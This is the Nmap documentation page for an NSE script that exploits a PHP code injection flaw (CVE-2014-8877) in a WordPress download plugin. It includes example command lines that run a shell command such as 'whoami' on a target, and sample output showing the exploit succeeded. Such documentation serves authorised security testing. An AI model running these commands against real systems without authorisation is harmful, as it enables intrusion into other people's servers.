Home page logo
/
Zenmap screenshot
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
Example Nmap output

File http-vuln-cve2014-8877

Script types: portrule
Categories: vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2014-8877.nse

User Summary

Exploits a remote code injection vulnerability (CVE-2014-8877) in Wordpress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.

CM Download Manager plugin does not correctly sanitise the user input which allows remote attackers to execute arbitrary PHP code via the CMDsearch parameter to cmdownloads/, which is processed by the PHP 'create_function' function.

The script injects PHP system() function into the vulnerable target in order to execute specified shell command.

Script Arguments

http-vuln-cve2014-8877.cmd

Command to execute. Default: nil

http-vuln-cve2014-8877.uri

Wordpress root directory on the website. Default: /

slaxml.debug

See the documentation for the slaxml library.

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap --script http-vuln-cve2014-8877 --script-args http-vuln-cve2014-8877.cmd="whoami",http-vuln-cve2014-8877.uri="/wordpress" <target>
nmap --script http-vuln-cve2014-8877 <target>

Script Output

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-8877:
|   VULNERABLE:
|   Code Injection in Wordpress CM Download Manager plugin
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-8877
|       CM Download Manager plugin does not correctly sanitise the user input
|       which allows remote attackers to execute arbitrary PHP code via the
|       CMDsearch parameter to cmdownloads/, which is processed by the PHP
|       'create_function' function.
|
|     Disclosure date: 2014-11-14
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8877

Requires


Author:

  • Mariusz Ziulek <mzet()owasp org>

License: Same as Nmap--See https://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]